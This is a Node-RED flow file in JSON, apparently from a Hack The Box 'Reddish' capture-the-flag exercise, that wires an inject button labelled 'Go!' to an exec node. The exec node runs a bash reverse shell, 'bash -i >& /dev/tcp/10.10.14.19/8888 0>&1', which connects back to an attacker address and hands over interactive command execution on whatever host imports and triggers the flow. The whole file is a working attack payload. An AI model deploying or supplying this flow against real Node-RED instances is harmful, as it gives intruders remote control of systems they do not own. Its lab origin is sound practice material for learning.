htb-reddish/node-red/reverse-shell.json
[
    {
        "id": "d4a7570d.ab25a8",
        "type": "tab",
        "label": "reverse-shell",
        "disabled": false,
        "info": ""
    },
    {
        "id": "7635e880.e6be48",
        "type": "inject",
        "z": "d4a7570d.ab25a8",
        "name": "Go!",
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "x": 110,
        "y": 60,
        "wires": [
            [
                "eb96f97e.c76c"
            ]
        ]
    },
    {
        "id": "eb96f97e.c76c",
        "type": "exec",
        "z": "d4a7570d.ab25a8",
        "command": "bash -c 'bash -i >& /dev/tcp/10.10.14.19/8888 0>&1'",
        "addpay": true,
        "append": "",
        "useSpawn": "false",
        "timer": "",
        "oldrc": false,
        "name": "",
        "x": 440,
        "y": 100,
        "wires": [
            [
                "dcb8c527.f60348"
            ],
            [
                "dcb8c527.f60348"
            ],
            [
                "dcb8c527.f60348"
            ]
        ]
    },
    {
        "id": "dcb8c527.f60348",
        "type": "debug",
        "z": "d4a7570d.ab25a8",
        "name": "",
        "active": true,
        "tosidebar": true,
        "console": false,
        "tostatus": false,
        "complete": "false",
        "x": 810,
        "y": 140,
        "wires": []
    }
]
